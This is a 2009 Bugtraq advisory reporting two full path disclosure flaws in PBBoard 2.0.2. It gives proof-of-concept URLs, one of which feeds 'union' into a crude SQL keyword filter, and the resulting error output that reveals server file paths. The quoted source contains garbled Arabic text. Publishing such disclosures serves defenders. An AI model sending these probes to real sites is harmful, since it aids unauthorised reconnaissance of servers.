[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Advisory]PBBoard <=2.0.2 Full Path Disclosure
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: [Advisory]PBBoard <=2.0.2 Full Path Disclosure
- From: admin@xxxxxxxxxxxx
- Date: Tue, 6 Oct 2009 10:11:15 -0600
Advisory]PBBoard <=2.0.2 - Full Path Disclosure
Details
=======
Product: PHP <= PBBoard
Security-Risk: moderated
Remote-Exploit: yes
Vendor-URL: http://www.pbboard.com
Credits
============
Discovered by: rUnViRuS
site: http://www.sec-area.com
Affected Products:
----------------------------
test on PBBoard 2.0.2
maybe work under 2.0.2
More Details
============
1. Full Path Disclosure
-----------------------------------
allow attackers to gather the real path of the server side script.
Proof of concept:
http://www.[xxxxx].com/path/index.php?page=new_topic&index=1&id=union
error
Fatal error: Call to undefined method PowerBBLocalCommon::error() in
/home/xxx/public_html/vb/common.php on line 193
code :
// Check if $_GET don't value any SQL Injection
foreach ($PowerBB->_GET as $sql_get)
{
if ((eregi("select", $sql_get)) or
(eregi("union", $sql_get)) or
(eregi("%", $sql_get)))
{
$this->error('ظ?ظ?طھ
ط¨ط¹ظ?ظ?ظٹظ?
ط؛ظٹط±
ظ?ط´ط±ظ?ط¹ظ?!');
}
}
================
================
2. Full Path Disclosure
-----------------------------------
allow attackers to gather the real path of the server side script.
Proof of concept:
http://www.[xxxx].com/[path]/index.php?page=search&start=1&keyword=§ion=all&search=1
Warning: filesize() [function.filesize]: stat failed for show_msg in
/home/xxxxx/public_html/vb/includes/template.class.php on line 99
Fatal error: ERROR::FILE_SIZE_IS_ZERO in
/home/xxxxx/public_html/vb/includes/template.class.php on line 146
--------------------------------------------------
[W]orld [D]efacers [T]eam
http://www.Sec-area.com
--------------------------------------------------